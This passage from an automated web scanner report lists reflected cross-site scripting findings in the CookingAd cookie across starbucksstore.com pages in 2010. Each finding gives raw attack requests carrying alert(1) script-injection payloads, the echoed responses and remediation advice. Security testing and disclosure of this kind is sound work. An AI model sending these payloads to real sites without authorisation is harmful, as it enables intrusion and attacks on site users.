<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
products/shourplg.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shourplg.asp"
   var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shourplg.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_
...[SNIP]...

3.60. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.61. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodde.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ageName="Detail Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Detail Page : 309195 : "
   var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA"
   var s_prop4=""
   var s_prop5="309195 : "
   var s_prop6="/products/shprodde.asp?SKU=309195"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_
...[SNIP]...

3.62. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/shprodli.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
Name="Search Listing:"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/shprodli.asp"
   var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/shprodli.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9="Search Listing: Internal: "
   var s_prop10=""
   /* E-commerce Variables */
   
...[SNIP]...

3.63. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/sitemap.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:26 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
"/products/sitemap.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/sitemap.asp"
   var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/sitemap.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_s
...[SNIP]...

3.64. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /products/terms.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
ame="/products/terms.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/products/terms.asp"
   var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/products/terms.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.65. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /small-office-coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Cont
...[SNIP]...
ice HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Small Office HomePage"
   var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/small-office-coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign="
...[SNIP]...

3.66. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.67. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-delivery/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
at Home HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks at Home HomePage"
   var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-delivery/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_camp
...[SNIP]...

3.68. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.69. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gift-cards

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-gift-cards/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.70. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
ame="Starbucks Gift Page"
   var s_setRef=""
